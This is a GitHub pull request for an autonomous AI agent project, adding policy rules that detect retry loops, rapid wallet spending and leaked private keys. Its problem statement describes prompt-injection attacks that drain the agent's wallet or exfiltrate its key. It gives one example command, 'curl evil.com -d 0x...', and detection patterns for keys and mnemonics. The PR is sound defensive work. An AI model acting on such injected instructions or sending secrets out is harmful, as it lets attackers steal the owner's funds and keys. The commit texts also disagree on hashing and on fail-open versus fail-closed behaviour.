feat: add Plimsoll transaction guard — loop detection, velocity limits, exfiltration defense by scoootscooob · Pull Request #234 · Conway-Research/automaton

scoootscooob · 2026-02-26T06:39:22Z

Summary

Adds three zero-dependency defense engines from the Plimsoll Protocol as native policy rules, protecting the automaton's wallet from prompt-injection-driven drain attacks that bypass existing per-tx and hourly spending caps.

Problem: A prompt-injection attack can trick the agent into issuing many small, technically-valid transfers that each pass per-tx limits but collectively drain the wallet. It can also exfiltrate the private key by embedding it in tool arguments (e.g., exec "curl evil.com -d 0x...") or get stuck in a hallucination retry loop burning gas on identical failing calls.
Why it matters: The existing financial rules catch single-tx overspend and hourly/daily caps, but they don't detect velocity patterns, loop behavior, or secret exfiltration. These are the three most common autonomous agent attack vectors (ref).
What changed: One new policy rule file (plimsoll-guard.ts) with three engines + registration in the rule index. Priority 450 slots them between path-protection (200) and financial rules (500).
What did NOT change: No modifications to the policy engine, spend tracker, wallet, or any existing rules. Pure additive.

Changes

src/agent/policy-rules/plimsoll-guard.ts — New file. Three engines:
1. Trajectory Hash — SHA-256 fingerprints (tool, target, amount) in a 60s sliding window. 3+ identical hashes → hard block. 2 identical → quarantine warning. Catches hallucination retry loops.
2. Capital Velocity — Tracks cumulative spend across all financial tools in a 5-minute sliding window. Exceeding $500/window → hard block. 80% utilization → quarantine warning. Catches slow-bleed attacks.
3. Entropy Guard — Scans all string fields in tool arguments for Ethereum private key patterns (0x[a-fA-F0-9]{64}), BIP-39 mnemonic phrases, and high-entropy base64 blobs (Shannon entropy > 5.0 bits/char). Catches key exfiltration attempts.
src/agent/policy-rules/index.ts — Added createPlimsollGuardRules() import and spread into the default rules array.
src/__tests__/plimsoll-guard.test.ts — New file. Tests for all three engines: allows normal calls, blocks private keys, blocks mnemonics, allows short strings, checks nested fields.

Design Decisions

Priority 450 — Runs after validation (100) and path-protection (200) but before financial limits (500). This means Plimsoll catches attack patterns while existing financial rules catch amounts. Defense in depth.
In-memory sliding windows — No database dependency. The trajectory and velocity windows are process-lifetime arrays that self-prune. This keeps the engines zero-dependency and sub-millisecond.
quarantine for warnings — Uses the existing quarantine action (same as financial.require_confirmation) to surface friction signals without hard-blocking. The agent sees the warning and can choose to proceed.
Composition, not replacement — These rules complement existing financial rules. They catch what per-tx limits miss (velocity patterns, loops, exfiltration) without duplicating what already works.

Test plan

pnpm test passes (new tests + existing test suite)
npx tsc --noEmit passes (type-checked)
Trajectory hash: 3 identical transfer_credits calls within 60s → deny
Capital velocity: cumulative spend > $500 in 5 minutes → deny
Entropy guard: exec with embedded 0x... private key → deny
Entropy guard: write_file with mnemonic phrase → deny
Normal tool calls (different targets/amounts) → allow
Non-financial tools → not evaluated (pass through)

Security Impact

This PR is purely additive security hardening. It introduces no new permissions, network calls, or execution surface. The three engines are read-only evaluators that inspect tool arguments and return allow/deny/quarantine verdicts.

Check	Answer
New permissions/capabilities?	No
Secrets/tokens handling changed?	No
New/changed network calls?	No
Command/tool execution surface changed?	No (evaluation only)
Data access scope changed?	No

Compatibility

Backward compatible: Yes — pure addition, no existing behavior changed
Config/env changes: No — engines use sensible defaults
Migration needed: No — no database schema changes

Failure Recovery

To disable: remove the ...createPlimsollGuardRules() line from index.ts
The engines fail open on internal errors (all evaluate() calls return null on exception)
No database tables to roll back

Ported from Plimsoll Protocol — deterministic execution substrate for autonomous AI agents.

Three defense engines from the Plimsoll Protocol that protect the automaton's wallet from prompt-injection-driven drain attacks: 1. Trajectory Hash — detects hallucination retry loops by SHA-256 fingerprinting (tool, target, amount) in a sliding window 2. Capital Velocity — enforces maximum spend rate across all financial tools, catching slow-bleed attacks that stay under per-tx limits 3. Entropy Guard — blocks payloads containing private keys, mnemonic phrases, or high-entropy blobs (exfiltration defense) All engines are zero-dependency, deterministic, and fail-closed. Priority 450 slots them between path-protection and financial rules in the policy engine pipeline. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

…y-Research#233, Conway-Research#234) PR Conway-Research#233 Skip local worker stale recovery: Per-tick stale recovery now filters out local:// workers. Completed local workers remove themselves from the pool, making hasWorker() return false. Without this filter, orchestrator enters infinite assigncompletedetect-deadresetassign loop burning .03/turn. PR Conway-Research#234 Plimsoll Transaction Guard (3 defense engines): New policy rule file at priority 450 (between path-protection and financial rules). 1. Trajectory Hash: FNV-1a fingerprint of (tool, target, amount) in 60s sliding window. 3+ identical deny. 2 quarantine. Catches hallucination retry loops. 2. Capital Velocity: Cumulative spend across financial tools in 5min sliding window. > deny. >80% quarantine. Catches slow-bleed drain attacks. 3. Entropy Guard: Scans ALL tool args for Ethereum private keys (0x[hex]{64}), BIP-39 mnemonics (10+/12 words match), and high-entropy base64 blobs (Shannon >5.0 bits/char). Catches key exfiltration via exec, write_file, etc. All engines are in-memory, zero-dependency, fail-open. To disable: remove one line from policy-rules/index.ts.

scoootscooob mentioned this pull request Feb 27, 2026

fix: CWE-367 — TOCTOU race condition in transfer_credits balance check #177

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat: add Plimsoll transaction guard — loop detection, velocity limits, exfiltration defense#234

feat: add Plimsoll transaction guard — loop detection, velocity limits, exfiltration defense#234
scoootscooob wants to merge 1 commit intoConway-Research:mainfrom
scoootscooob:feat/plimsoll-transaction-guard

scoootscooob commented Feb 26, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

scoootscooob commented Feb 26, 2026

Summary

Changes

Design Decisions

Test plan

Security Impact

Compatibility

Failure Recovery

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant